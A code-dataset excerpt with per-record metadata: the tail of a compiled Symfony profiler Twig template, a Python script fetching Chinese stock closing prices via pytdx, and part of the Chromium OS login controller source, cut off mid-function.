return array ( 507 => 225, 502 => 222, 494 => 220, 488 => 217, 485 => 216, 483 => 215, 480 => 214, 477 => 213, 473 => 212, 467 => 209, 464 => 208, 462 => 207, 459 => 206, 452 => 202, 446 => 199, 442 => 198, 435 => 193, 433 => 192, 428 => 189, 422 => 187, 416 => 183, 414 => 182, 405 => 176, 400 => 173, 394 => 171, 388 => 167, 386 => 166, 381 => 163, 375 => 161, 369 => 157, 367 => 156, 358 => 150, 351 => 146, 338 => 136, 334 => 134, 328 => 130, 322 => 127, 319 => 126, 317 => 125, 312 => 122, 310 => 121, 303 => 117, 299 => 115, 293 => 113, 287 => 109, 285 => 108, 280 => 105, 274 => 103, 268 => 99, 266 => 98, 261 => 95, 255 => 93, 249 => 89, 247 => 88, 242 => 85, 236 => 83, 230 => 79, 228 => 78, 219 => 71, 213 => 70, 202 => 65, 199 => 64, 193 => 63, 184 => 60, 181 => 59, 171 => 56, 163 => 51, 158 => 48, 152 => 45, 148 => 43, 146 => 42, 140 => 39, 130 => 34, 126 => 32, 124 => 31, 121 => 30, 118 => 29, 113 => 27, 110 => 26, 108 => 25, 101 => 24, 99 => 23, 96 => 22, 94 => 21, 91 => 20, 88 => 19, 82 => 17, 79 => 16, 73 => 15, 69 => 12, 67 => 11, 65 => 9, 62 => 8, 51 => 7, 48 => 6, 45 => 5, 42 => 4, 36 => 3, 11 => 1,);
}
}
/* {% extends '@WebProfiler/Profiler/layout.html.twig' %}*/
/* */
/* {% block toolbar %}*/
/* {% set request_handler %}*/
/* {% if collector.controller.class is defined %}*/
/* {% set link = collector.controller.file|file_link(collector.controller.line) %}*/
/* {% if link %}<a href="{{ link }}" title="{{ collector.controller.file }}">{% else %}<span>{% endif %}*/
/* */
/* {{ collector.controller.class|abbr_class|striptags }}*/
/* */
/* {%- if collector.controller.method -%}*/
/* :: {{ collector.controller.method }}*/
/* {%- endif -%}*/
/* */
/* {% if link %}</a>{% else %}</span>{% endif %}*/
/* {% else %}*/
/* <span>{{ collector.controller }}</span>*/
/* {% endif %}*/
/* {% endset %}*/
/* */
/* {% set request_status_code_color = (collector.statuscode >= 400) ? 'red' : (collector.statuscode >= 300) ? 'yellow' : 'green' %}*/
/* */
/* {% set icon %}*/
/* <span class="sf-toolbar-status sf-toolbar-status-{{ request_status_code_color }}">{{ collector.statuscode }}</span>*/
/* {% if collector.route %}*/
/* <span class="sf-toolbar-label">@</span>*/
/* <span class="sf-toolbar-value sf-toolbar-info-piece-additional">{{ collector.route }}</span>*/
/* {% endif %}*/
/* {% endset %}*/
/* */
/* {% set text %}*/
/* <div class="sf-toolbar-info-piece">*/
/* <b>HTTP status</b>*/
/* <span>{{ collector.statuscode }} {{ collector.statustext }}</span>*/
/* </div>*/
/* */
/* <div class="sf-toolbar-info-piece">*/
/* <b>Controller</b>*/
/* <span>{{ request_handler }}</span>*/
/* </div>*/
/* */
/* {% if collector.controller.class is defined %}*/
/* <div class="sf-toolbar-info-piece">*/
/* <b>Controller class</b>*/
/* <span>{{ collector.controller.class }}</span>*/
/* </div>*/
/* {% endif %}*/
/* */
/* <div class="sf-toolbar-info-piece">*/
/* <b>Route name</b>*/
/* <span>{{ collector.route|default('NONE') }}</span>*/
/* </div>*/
/* */
/* <div class="sf-toolbar-info-piece">*/
/* <b>Has session</b>*/
/* <span>{% if collector.sessionmetadata|length %}yes{% else %}no{% endif %}</span>*/
/* </div>*/
/* {% endset %}*/
/* */
/* {{ include('@WebProfiler/Profiler/toolbar_item.html.twig', { link: profiler_url }) }}*/
/* {% endblock %}*/
/* */
/* {% block menu %}*/
/* <span class="label">*/
/* <span class="icon">{{ include('@WebProfiler/Icon/request.svg') }}</span>*/
/* <strong>Request / Response</strong>*/
/* </span>*/
/* {% endblock %}*/
/* */
/* {% block panel %}*/
/* <div class="sf-tabs">*/
/* <div class="tab">*/
/* <h3 class="tab-title">Request</h3>*/
/* */
/* <div class="tab-content">*/
/* <h3>GET Parameters</h3>*/
/* */
/* {% if collector.requestquery.all is empty %}*/
/* <div class="empty">*/
/* <p>No GET parameters</p>*/
/* </div>*/
/* {% else %}*/
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: collector.requestquery }, with_context = false) }}*/
/* {% endif %}*/
/* */
/* <h3>POST Parameters</h3>*/
/* */
/* {% if collector.requestrequest.all is empty %}*/
/* <div class="empty">*/
/* <p>No POST parameters</p>*/
/* </div>*/
/* {% else %}*/
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: collector.requestrequest }, with_context = false) }}*/
/* {% endif %}*/
/* */
/* <h3>Request Attributes</h3>*/
/* */
/* {% if collector.requestattributes.all is empty %}*/
/* <div class="empty">*/
/* <p>No attributes</p>*/
/* </div>*/
/* {% else %}*/
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: collector.requestattributes }, with_context = false) }}*/
/* {% endif %}*/
/* */
/* <h3>Cookies</h3>*/
/* */
/* {% if collector.requestcookies.all is empty %}*/
/* <div class="empty">*/
/* <p>No cookies</p>*/
/* </div>*/
/* {% else %}*/
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: collector.requestcookies }, with_context = false) }}*/
/* {% endif %}*/
/* */
/* <h3>Request Headers</h3>*/
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: collector.requestheaders, labels: ['Header', 'Value'] }, with_context = false) }}*/
/* */
/* <h3>Request Content</h3>*/
/* */
/* {% if collector.content == false %}*/
/* <div class="empty">*/
/* <p>Request content not available (it was retrieved as a resource).</p>*/
/* </div>*/
/* {% elseif collector.content %}*/
/* <div class="card">*/
/* <pre class="break-long-words">{{ collector.content }}</pre>*/
/* </div>*/
/* {% else %}*/
/* <div class="empty">*/
/* <p>No content</p>*/
/* </div>*/
/* {% endif %}*/
/* */
/* <h3>Server Parameters</h3>*/
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: collector.requestserver }, with_context = false) }}*/
/* </div>*/
/* </div>*/
/* */
/* <div class="tab">*/
/* <h3 class="tab-title">Response</h3>*/
/* */
/* <div class="tab-content">*/
/* <h3>Response Headers</h3>*/
/* */
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: collector.responseheaders, labels: ['Header', 'Value'] }, with_context = false) }}*/
/* </div>*/
/* </div>*/
/* */
/* <div class="tab {{ collector.sessionmetadata is empty ? 'disabled' }}">*/
/* <h3 class="tab-title">Session</h3>*/
/* */
/* <div class="tab-content">*/
/* <h3>Session Metadata</h3>*/
/* */
/* {% if collector.sessionmetadata is empty %}*/
/* <div class="empty">*/
/* <p>No session metadata</p>*/
/* </div>*/
/* {% else %}*/
/* {{ include('@WebProfiler/Profiler/table.html.twig', { data: collector.sessionmetadata }, with_context = false) }}*/
/* {% endif %}*/
/* */
/* <h3>Session Attributes</h3>*/
/* */
/* {% if collector.sessionattributes is empty %}*/
/* <div class="empty">*/
/* <p>No session attributes</p>*/
/* </div>*/
/* {% else %}*/
/* {{ include('@WebProfiler/Profiler/table.html.twig', { data: collector.sessionattributes, labels: ['Attribute', 'Value'] }, with_context = false) }}*/
/* {% endif %}*/
/* </div>*/
/* </div>*/
/* */
/* <div class="tab {{ collector.flashes is empty ? 'disabled' }}">*/
/* <h3 class="tab-title">Flashes</h3>*/
/* */
/* <div class="tab-content">*/
/* <h3>Flashes</h3>*/
/* */
/* {% if collector.flashes is empty %}*/
/* <div class="empty">*/
/* <p>No flash messages were created.</p>*/
/* </div>*/
/* {% else %}*/
/* {{ include('@WebProfiler/Profiler/table.html.twig', { data: collector.flashes }, with_context = false) }}*/
/* {% endif %}*/
/* </div>*/
/* </div>*/
/* */
/* {% if profile.parent %}*/
/* <div class="tab">*/
/* <h3 class="tab-title">Parent Request</h3>*/
/* */
/* <div class="tab-content">*/
/* <h3>*/
/* <a href="{{ path('_profiler', { token: profile.parent.token }) }}">Return to parent request</a>*/
/* <small>(token = {{ profile.parent.token }})</small>*/
/* </h3>*/
/* */
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: profile.parent.getcollector('request').requestattributes }, with_context = false) }}*/
/* </div>*/
/* </div>*/
/* {% endif %}*/
/* */
/* {% if profile.children|length %}*/
/* <div class="tab">*/
/* <h3 class="tab-title">Sub Requests <span class="badge">{{ profile.children|length }}</span></h3>*/
/* */
/* <div class="tab-content">*/
/* {% for child in profile.children %}*/
/* <h3>*/
/* <a href="{{ path('_profiler', { token: child.token }) }}">*/
/* {{- child.getcollector('request').requestattributes.get('_controller') -}}*/
/* </a>*/
/* <small>(token = {{ child.token }})</small>*/
/* </h3>*/
/* */
/* {{ include('@WebProfiler/Profiler/bag.html.twig', { bag: child.getcollector('request').requestattributes }, with_context = false) }}*/
/* {% endfor %}*/
/* </div>*/
/* </div>*/
/* {% endif %}*/
/* </div>*/
/* {% endblock %}*/
/* */
|
PHP
|
MIT
|
jed38630/marketplace/var/cache/dev/twig/e3/e35fa14b85c892a2b28242bd8c7c5f7c991bc262803cfb13465ddaf168dc32ed.php
|
be5a0b68-02c2-4b6b-8a43-9a080c0b7fa9
|
[]
|
[]
|
# coding: utf-8
from pytdx.hq import TdxHq_API
from pytdx.params import TDXParams
import pandas as pd
import numpy as np
import re
import csv
import io
import time
import traceback
if __name__ == '__main__':
    # Load the list of instrument symbols (e.g. "SH600000" / "SZ000001"),
    # one per line, from the shared data directory.
    with io.open(r'..\all_other_data\symbol.txt', 'r', encoding='utf-8') as f:
        symbol = [s.strip() for s in f.readlines()]

    # Connect to a TDX quote server; raise_exception/auto_retry make
    # transient network failures either retried or loudly reported.
    TDXHQ = TdxHq_API(raise_exception=True, auto_retry=True)
    if not TDXHQ.connect('121.14.110.200', 443):
        raise Exception("Can't connect.")

    #symbol = symbol[0:5]

    # Build the result frame up front so the rename/to_csv steps below work
    # even when the symbol list is empty or every symbol fails.  (Previously
    # quote_df was only created inside the loop on the first success, which
    # raised NameError in those cases.)
    quote_df = pd.DataFrame(columns=['code', 'price'])
    for code in symbol:
        # Market 1 = Shanghai ("SH" prefix), 0 = Shenzhen; the two-letter
        # exchange prefix is stripped before querying.
        if code[0:2] == 'SH':
            market = 1
        else:
            market = 0
        code = code[2:]
        #quote_info = TDXHQ.get_security_quotes([(market, code)])
        # Category 9 = daily K-line; fetch only the most recent bar.
        quote_info = TDXHQ.get_security_bars(9, market, code, 0, 1)
        try:
            # Append the latest close; IndexError here means the server
            # returned no bars for this symbol, which is skipped below.
            quote_df.loc[quote_df.shape[0]] = [code, quote_info[0]['close']]
        except Exception as e:
            # Best-effort: a bad symbol must not abort the whole export.
            # str(e) replaces the deprecated/unreliable e.message.
            print("code {}, process bars error, skipped.".format(code))
            print(str(e))
            print(quote_info)

    # Rename to the Chinese column headers expected by downstream sheets.
    quote_df = quote_df.rename(columns={
        'code': '代码',
        'price': '价格',
    })
    # string_columns = ['代码']
    # quote_df[string_columns] = quote_df[string_columns].applymap(
    #     lambda x: '=""' if type(x) is float else '="' + str(x) + '"')
    quote_df.to_csv(r"..\all_other_data\all_last_price.csv", encoding="gbk", quoting=csv.QUOTE_NONE, index=False)

    TDXHQ.disconnect()
|
Python
|
MIT
|
lte2000/cwfx/get_data/get_last_price.py
|
5d51c5f8-c845-4e94-a855-c776ba1b4fac
|
[{"tag": "IP_ADDRESS", "value": "121.14.110.200", "start": 430, "end": 444, "context": "=True, auto_retry=True)\n if not TDXHQ.connect('121.14.110.200', 443):\n raise Exception(\"Can't connect.\")"}]
|
[{"tag": "IP_ADDRESS", "value": "121.14.110.200", "start": 430, "end": 444, "context": "=True, auto_retry=True)\n if not TDXHQ.connect('121.14.110.200', 443):\n raise Exception(\"Can't connect.\")"}]
|
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/chromeos/login/existing_user_controller.h"
#include <vector>
#include "base/bind.h"
#include "base/bind_helpers.h"
#include "base/callback.h"
#include "base/command_line.h"
#include "base/logging.h"
#include "base/memory/scoped_ptr.h"
#include "base/message_loop.h"
#include "base/metrics/histogram.h"
#include "base/prefs/pref_service.h"
#include "base/strings/string_util.h"
#include "base/strings/stringprintf.h"
#include "base/strings/utf_string_conversions.h"
#include "base/values.h"
#include "base/version.h"
#include "chrome/browser/browser_process.h"
#include "chrome/browser/chromeos/accessibility/accessibility_manager.h"
#include "chrome/browser/chromeos/boot_times_loader.h"
#include "chrome/browser/chromeos/cros/cros_library.h"
#include "chrome/browser/chromeos/customization_document.h"
#include "chrome/browser/chromeos/kiosk_mode/kiosk_mode_settings.h"
#include "chrome/browser/chromeos/login/helper.h"
#include "chrome/browser/chromeos/login/login_display_host.h"
#include "chrome/browser/chromeos/login/login_utils.h"
#include "chrome/browser/chromeos/login/startup_utils.h"
#include "chrome/browser/chromeos/login/user_manager.h"
#include "chrome/browser/chromeos/login/wizard_controller.h"
#include "chrome/browser/chromeos/net/connectivity_state_helper.h"
#include "chrome/browser/chromeos/policy/device_local_account.h"
#include "chrome/browser/chromeos/profiles/profile_helper.h"
#include "chrome/browser/chromeos/settings/cros_settings.h"
#include "chrome/browser/chromeos/settings/cros_settings_names.h"
#include "chrome/browser/chromeos/system/statistics_provider.h"
#include "chrome/browser/google/google_util.h"
#include "chrome/browser/policy/policy_service.h"
#include "chrome/browser/prefs/session_startup_pref.h"
#include "chrome/common/chrome_notification_types.h"
#include "chrome/common/chrome_switches.h"
#include "chrome/common/chrome_version_info.h"
#include "chrome/common/pref_names.h"
#include "chrome/common/url_constants.h"
#include "chromeos/chromeos_switches.h"
#include "chromeos/dbus/dbus_thread_manager.h"
#include "chromeos/dbus/power_manager_client.h"
#include "chromeos/dbus/session_manager_client.h"
#include "content/public/browser/browser_thread.h"
#include "content/public/browser/notification_service.h"
#include "content/public/browser/notification_types.h"
#include "content/public/browser/user_metrics.h"
#include "google_apis/gaia/gaia_auth_util.h"
#include "google_apis/gaia/google_service_auth_error.h"
#include "grit/generated_resources.h"
#include "net/http/http_auth_cache.h"
#include "net/http/http_network_session.h"
#include "net/http/http_transaction_factory.h"
#include "net/url_request/url_request_context.h"
#include "net/url_request/url_request_context_getter.h"
#include "ui/base/l10n/l10n_util.h"
#include "ui/views/widget/widget.h"
namespace chromeos {
namespace {
// Major version where we still show GSG as "Release Notes" after the update.
// Plain int per Chromium style; the value easily fits (long int was
// unnecessarily wide and inconsistent with the rest of the codebase).
const int kReleaseNotesTargetRelease = 19;

// URL for account creation.
const char kCreateAccountURL[] =
    "https://accounts.google.com/NewAccount?service=mail";

// ChromeVox tutorial URL (used in place of "getting started" url when
// accessibility is enabled).
const char kChromeVoxTutorialURLPattern[] =
    "http://www.chromevox.com/tutorial/index.html?lang=%s";

// Delay for transferring the auth cache to the system profile.
const int kAuthCacheTransferDelayMs = 2000;

// Delay for restarting the ui if safe-mode login has failed.
const int kSafeModeRestartUiDelayMs = 30000;

// Delay for rebooting machine if TPM critical error was encountered.
const int kCriticalErrorRebootDelayMs = 3500;
// Makes a call to the policy subsystem to reload the policy when we detect
// authentication change. Must run on the UI thread.
void RefreshPoliciesOnUIThread() {
  // The policy service can be NULL (e.g. during shutdown); skip in that case.
  if (g_browser_process->policy_service())
    g_browser_process->policy_service()->RefreshPolicies(base::Closure());
}
// Copies any authentication details that were entered in the login profile to
// the main profile to make sure all subsystems of Chrome can access the
// network with the provided authentication which are possibly for a proxy
// server. Must run on the IO thread; both getters must outlive this call
// (callers pass scoped_refptrs through base::Bind to guarantee that).
void TransferContextAuthenticationsOnIOThread(
    net::URLRequestContextGetter* default_profile_context_getter,
    net::URLRequestContextGetter* browser_process_context_getter) {
  net::HttpAuthCache* new_cache =
      browser_process_context_getter->GetURLRequestContext()->
          http_transaction_factory()->GetSession()->http_auth_cache();
  net::HttpAuthCache* old_cache =
      default_profile_context_getter->GetURLRequestContext()->
          http_transaction_factory()->GetSession()->http_auth_cache();
  // Merge the sign-in profile's cached credentials into the system cache.
  new_cache->UpdateAllFrom(*old_cache);
  VLOG(1) << "Main request context populated with authentication data.";
  // Last but not least tell the policy subsystem to refresh now as it might
  // have been stuck until now too.
  content::BrowserThread::PostTask(content::BrowserThread::UI, FROM_HERE,
                                   base::Bind(&RefreshPoliciesOnUIThread));
}
} // namespace
// static
// Pointer to the single live controller: set in the constructor, cleared in
// the destructor (see the DCHECK/NOTREACHED pair enforcing uniqueness).
ExistingUserController* ExistingUserController::current_controller_ = NULL;
////////////////////////////////////////////////////////////////////////////////
// ExistingUserController, public:
// Registers this instance as the single live controller and subscribes to the
// login-screen notifications and cros settings it reacts to (see Observe()).
ExistingUserController::ExistingUserController(LoginDisplayHost* host)
    : login_status_consumer_(NULL),
      host_(host),
      login_display_(host_->CreateLoginDisplay(this)),
      num_login_attempts_(0),
      cros_settings_(CrosSettings::Get()),
      weak_factory_(this),
      offline_failed_(false),
      is_login_in_progress_(false),
      password_changed_(false),
      do_auto_enrollment_(false),
      signin_screen_ready_(false) {
  // Only one controller may exist at a time; the destructor clears this.
  DCHECK(current_controller_ == NULL);
  current_controller_ = this;
  registrar_.Add(this,
                 chrome::NOTIFICATION_LOGIN_USER_IMAGE_CHANGED,
                 content::NotificationService::AllSources());
  registrar_.Add(this,
                 chrome::NOTIFICATION_USER_LIST_CHANGED,
                 content::NotificationService::AllSources());
  registrar_.Add(this,
                 chrome::NOTIFICATION_AUTH_SUPPLIED,
                 content::NotificationService::AllSources());
  registrar_.Add(this,
                 chrome::NOTIFICATION_SESSION_STARTED,
                 content::NotificationService::AllSources());
  // Every observer added here must be removed in the destructor.
  cros_settings_->AddSettingsObserver(kAccountsPrefShowUserNamesOnSignIn, this);
  cros_settings_->AddSettingsObserver(kAccountsPrefAllowNewUser, this);
  cros_settings_->AddSettingsObserver(kAccountsPrefAllowGuest, this);
  cros_settings_->AddSettingsObserver(kAccountsPrefUsers, this);
  cros_settings_->AddSettingsObserver(
      kAccountsPrefDeviceLocalAccountAutoLoginId,
      this);
  cros_settings_->AddSettingsObserver(
      kAccountsPrefDeviceLocalAccountAutoLoginDelay,
      this);
}
// Populates the login display with |users|, arms public-session auto-login,
// warms up authentication and tells the session manager the prompt is ready.
void ExistingUserController::Init(const UserList& users) {
  // Record the moment the prompt became available; used for the
  // Login.PromptToCompleteLoginTime UMA metric in CompleteLogin().
  time_init_ = base::Time::Now();
  UpdateLoginDisplay(users);
  ConfigurePublicSessionAutoLogin();
  LoginUtils::Get()->PrewarmAuthentication();
  DBusThreadManager::Get()->GetSessionManagerClient()->EmitLoginPromptReady();
}
// Filters |users| according to the whitelist / user-type policy and
// (re)initializes the login display with the resulting pod configuration.
void ExistingUserController::UpdateLoginDisplay(const UserList& users) {
  bool show_users_on_signin;
  UserList filtered_users;
  cros_settings_->GetBoolean(kAccountsPrefShowUserNamesOnSignIn,
                             &show_users_on_signin);
  if (show_users_on_signin) {
    for (UserList::const_iterator it = users.begin(); it != users.end(); ++it) {
      // TODO(xiyuan): Clean user profile whose email is not in whitelist.
      // Non-regular users (public accounts etc.) bypass the whitelist check.
      if (LoginUtils::IsWhitelisted((*it)->email()) ||
          (*it)->GetType() != User::USER_TYPE_REGULAR) {
        filtered_users.push_back(*it);
      }
    }
  }
  // If no user pods are visible, fallback to single new user pod which will
  // have guest session link.
  bool show_guest;
  cros_settings_->GetBoolean(kAccountsPrefAllowGuest, &show_guest);
  bool show_users;
  cros_settings_->GetBoolean(kAccountsPrefShowUserNamesOnSignIn, &show_users);
  // Guest pod is suppressed when the user list is empty (the single new-user
  // pod carries the guest link instead).
  show_guest &= !filtered_users.empty();
  bool show_new_user = true;
  login_display_->set_parent_window(GetNativeWindow());
  login_display_->Init(filtered_users, show_guest, show_users, show_new_user);
  host_->OnPreferencesChanged();
}
// Flags that the next completed sign-in must be routed through the
// auto-enrollment flow (consumed by CompleteLoginInternal()).
void ExistingUserController::DoAutoEnrollment() {
  do_auto_enrollment_ = true;
}
// Resumes the sign-in that was suspended for auto-enrollment.
void ExistingUserController::ResumeLogin() {
  // This means the user signed-in, then auto-enrollment used his credentials
  // to enroll and succeeded.
  resume_login_callback_.Run();
  // One-shot: reset so a stale callback can never be run twice.
  resume_login_callback_.Reset();
}
// Locks down the sign-in UI ahead of an automatic kiosk app launch.
void ExistingUserController::PrepareKioskAppLaunch() {
  // Disable login UI while waiting for the kiosk app launch. There is no
  // balanced UI enable call because this very login screen will not be
  // accessed again. If app is launched, it will be destroyed. If app fails to
  // launch, chrome is restarted to go back to a new login screen.
  login_display_->SetUIEnabled(false);
}
////////////////////////////////////////////////////////////////////////////////
// ExistingUserController, content::NotificationObserver implementation:
//
// Central notification dispatcher. NOTE: the if-blocks are intentionally not
// mutually exclusive — a SYSTEM_SETTING_CHANGED notification falls through
// both the auto-login reconfiguration and the display update below.
void ExistingUserController::Observe(
    int type,
    const content::NotificationSource& source,
    const content::NotificationDetails& details) {
  if (type == chrome::NOTIFICATION_SESSION_STARTED) {
    // Stop listening to any notification once session has started.
    // Sign in screen objects are marked for deletion with DeleteSoon so
    // make sure no object would be used after session has started.
    // http://crbug.com/125276
    registrar_.RemoveAll();
    return;
  }
  if (type == chrome::NOTIFICATION_SYSTEM_SETTING_CHANGED) {
    const std::string setting = *content::Details<const std::string>(
        details).ptr();
    // Auto-login settings changed: re-read them.
    if (setting == kAccountsPrefDeviceLocalAccountAutoLoginId ||
        setting == kAccountsPrefDeviceLocalAccountAutoLoginDelay) {
      ConfigurePublicSessionAutoLogin();
    }
  }
  if (type == chrome::NOTIFICATION_SYSTEM_SETTING_CHANGED ||
      type == chrome::NOTIFICATION_USER_LIST_CHANGED) {
    if (host_ != NULL) {
      // Signed settings or user list changed. Notify views and update them.
      UpdateLoginDisplay(chromeos::UserManager::Get()->GetUsers());
      ConfigurePublicSessionAutoLogin();
      return;
    }
  }
  if (type == chrome::NOTIFICATION_AUTH_SUPPLIED) {
    // Possibly the user has authenticated against a proxy server and we might
    // need the credentials for enrollment and other system requests from the
    // main |g_browser_process| request context (see bug
    // http://crosbug.com/24861). So we transfer any credentials to the global
    // request context here.
    // The issue we have here is that the NOTIFICATION_AUTH_SUPPLIED is sent
    // just after the UI is closed but before the new credentials were stored
    // in the profile. Therefore we have to give it some time to make sure it
    // has been updated before we copy it.
    LOG(INFO) << "Authentication was entered manually, possibly for proxyauth.";
    scoped_refptr<net::URLRequestContextGetter> browser_process_context_getter =
        g_browser_process->system_request_context();
    Profile* signin_profile = ProfileHelper::GetSigninProfile();
    scoped_refptr<net::URLRequestContextGetter> signin_profile_context_getter =
        signin_profile->GetRequestContext();
    DCHECK(browser_process_context_getter.get());
    DCHECK(signin_profile_context_getter.get());
    // Bind keeps refs to both getters alive until the delayed task runs on IO.
    content::BrowserThread::PostDelayedTask(
        content::BrowserThread::IO, FROM_HERE,
        base::Bind(&TransferContextAuthenticationsOnIOThread,
                   signin_profile_context_getter,
                   browser_process_context_getter),
        base::TimeDelta::FromMilliseconds(kAuthCacheTransferDelayMs));
  }
  // Only the user-image notification is handled past this point.
  if (type != chrome::NOTIFICATION_LOGIN_USER_IMAGE_CHANGED)
    return;
  login_display_->OnUserImageChanged(*content::Details<User>(details).ptr());
}
////////////////////////////////////////////////////////////////////////////////
// ExistingUserController, private:
// Unregisters every settings observer added by the constructor and clears the
// singleton pointer.
ExistingUserController::~ExistingUserController() {
  LoginUtils::Get()->DelegateDeleted(this);
  cros_settings_->RemoveSettingsObserver(kAccountsPrefShowUserNamesOnSignIn,
                                         this);
  cros_settings_->RemoveSettingsObserver(kAccountsPrefAllowNewUser, this);
  cros_settings_->RemoveSettingsObserver(kAccountsPrefAllowGuest, this);
  cros_settings_->RemoveSettingsObserver(kAccountsPrefUsers, this);
  cros_settings_->RemoveSettingsObserver(
      kAccountsPrefDeviceLocalAccountAutoLoginId,
      this);
  cros_settings_->RemoveSettingsObserver(
      kAccountsPrefDeviceLocalAccountAutoLoginDelay,
      this);
  // Pair of the constructor's singleton registration.
  if (current_controller_ == this) {
    current_controller_ = NULL;
  } else {
    NOTREACHED() << "More than one controller are alive.";
  }
  DCHECK(login_display_.get());
}
////////////////////////////////////////////////////////////////////////////////
// ExistingUserController, LoginDisplay::Delegate implementation:
//
// Aborts the password-changed recovery flow and re-enables the sign-in UI.
void ExistingUserController::CancelPasswordChangedFlow() {
  // Drop the performer (and the stale authentication state it holds).
  login_performer_.reset(NULL);
  login_display_->SetUIEnabled(true);
  StartPublicSessionAutoLoginTimer();
}
// Starts a guest session pointed at the account-creation page (account
// creation happens inside an off-the-record session).
void ExistingUserController::CreateAccount() {
  content::RecordAction(content::UserMetricsAction("Login.CreateAccount"));
  guest_mode_url_ =
      google_util::AppendGoogleLocaleParam(GURL(kCreateAccountURL));
  LoginAsGuest();
}
// Entry point for sign-ins completed by the (extension-based) sign-in UI.
// Records the prompt-to-login UMA metric and defers the rest of the flow to
// CompleteLoginInternal() after an async ownership check.
void ExistingUserController::CompleteLogin(const UserContext& user_context) {
  login_display_->set_signin_completed(true);
  if (!host_) {
    // Complete login event was generated already from UI. Ignore notification.
    return;
  }
  // Stop the auto-login timer when attempting login.
  StopPublicSessionAutoLoginTimer();
  // Disable UI while loading user profile.
  login_display_->SetUIEnabled(false);
  if (!time_init_.is_null()) {
    base::TimeDelta delta = base::Time::Now() - time_init_;
    UMA_HISTOGRAM_MEDIUM_TIMES("Login.PromptToCompleteLoginTime", delta);
    time_init_ = base::Time();  // Reset to null.
  }
  host_->OnCompleteLogin();
  // Do an ownership check now to avoid auto-enrolling if the device has
  // already been owned.
  DeviceSettingsService::Get()->GetOwnershipStatusAsync(
      base::Bind(&ExistingUserController::CompleteLoginInternal,
                 weak_factory_.GetWeakPtr(),
                 user_context));
}
// Continuation of CompleteLogin() invoked with the device ownership status.
// Either diverts to forced auto-enrollment (resumable via ResumeLogin()) or
// performs the login directly.
void ExistingUserController::CompleteLoginInternal(
    const UserContext& user_context,
    DeviceSettingsService::OwnershipStatus ownership_status,
    bool is_owner) {
  // Auto-enrollment must have made a decision by now. It's too late to enroll
  // if the protocol isn't done at this point.
  if (do_auto_enrollment_ &&
      ownership_status == DeviceSettingsService::OWNERSHIP_NONE) {
    VLOG(1) << "Forcing auto-enrollment before completing login";
    // The only way to get out of the enrollment screen from now on is to either
    // complete enrollment, or opt-out of it. So this controller shouldn't force
    // enrollment again if it is reused for another sign-in.
    do_auto_enrollment_ = false;
    auto_enrollment_username_ = user_context.username;
    // Saved so ResumeLogin() can finish the sign-in after enrollment.
    resume_login_callback_ = base::Bind(
        &ExistingUserController::PerformLogin,
        weak_factory_.GetWeakPtr(),
        user_context, LoginPerformer::AUTH_MODE_EXTENSION);
    ShowEnrollmentScreen(true, user_context.username);
    // Enable UI for the enrollment screen. SetUIEnabled(true) will post a
    // request to show the sign-in screen again when invoked at the sign-in
    // screen; invoke SetUIEnabled() after navigating to the enrollment screen.
    login_display_->SetUIEnabled(true);
  } else {
    PerformLogin(user_context, LoginPerformer::AUTH_MODE_EXTENSION);
  }
}
// Returns the display name of the currently connected network.
string16 ExistingUserController::GetConnectedNetworkName() {
  return GetCurrentNetworkName();
}
// True while a login attempt is outstanding (between Perform*/LoginAs* and
// the corresponding success/failure callback).
bool ExistingUserController::IsSigninInProgress() const {
  return is_login_in_progress_;
}
// Entry point for sign-ins typed into the built-in login UI. Tracks per-user
// attempt counts and resets password-change detection state when the
// attempted username changes.
void ExistingUserController::Login(const UserContext& user_context) {
  // Need either username+password or an OAuth auth code to proceed.
  if ((user_context.username.empty() || user_context.password.empty()) &&
      user_context.auth_code.empty())
    return;
  // Stop the auto-login timer when attempting login.
  StopPublicSessionAutoLoginTimer();
  // Disable clicking on other windows.
  login_display_->SetUIEnabled(false);
  BootTimesLoader::Get()->RecordLoginAttempted();
  if (last_login_attempt_username_ != user_context.username) {
    last_login_attempt_username_ = user_context.username;
    num_login_attempts_ = 0;
    // Also reset state variables, which are used to determine password change.
    offline_failed_ = false;
    online_succeeded_for_.clear();
  }
  num_login_attempts_++;
  PerformLogin(user_context, LoginPerformer::AUTH_MODE_INTERNAL);
}
// Creates (or reuses) the LoginPerformer and kicks off authentication for
// |user_context| in the given |auth_mode|.
void ExistingUserController::PerformLogin(
    const UserContext& user_context,
    LoginPerformer::AuthorizationMode auth_mode) {
  UserManager::Get()->GetUserFlow(last_login_attempt_username_)->
      set_host(host_);
  // Disable UI while loading user profile.
  login_display_->SetUIEnabled(false);
  // Use the same LoginPerformer for subsequent login as it has state
  // such as Authenticator instance.
  if (!login_performer_.get() || num_login_attempts_ <= 1) {
    LoginPerformer::Delegate* delegate = this;
    if (login_performer_delegate_.get())
      delegate = login_performer_delegate_.get();
    // Only one instance of LoginPerformer should exist at a time.
    // Explicit reset(NULL) destroys the old performer *before* the new one is
    // constructed (a plain reset(new ...) would evaluate `new` first).
    login_performer_.reset(NULL);
    login_performer_.reset(new LoginPerformer(delegate));
  }
  is_login_in_progress_ = true;
  // Locally managed users take a dedicated authentication path.
  if (gaia::ExtractDomainName(user_context.username) ==
          UserManager::kLocallyManagedUserDomain) {
    login_performer_->LoginAsLocallyManagedUser(
        UserContext(user_context.username,
                    user_context.password,
                    std::string()));  // auth_code
  } else {
    login_performer_->PerformLogin(user_context, auth_mode);
  }
  AccessibilityManager::Get()->MaybeSpeak(
      l10n_util::GetStringUTF8(IDS_CHROMEOS_ACC_LOGIN_SIGNING_IN));
}
// Starts a retail-mode (demo) session.
void ExistingUserController::LoginAsRetailModeUser() {
  // Stop the auto-login timer when attempting login.
  StopPublicSessionAutoLoginTimer();
  // Disable clicking on other windows.
  login_display_->SetUIEnabled(false);
  // TODO(rkc): Add a CHECK to make sure retail mode logins are allowed once
  // the enterprise policy wiring is done for retail mode.
  // Only one instance of LoginPerformer should exist at a time.
  login_performer_.reset(NULL);
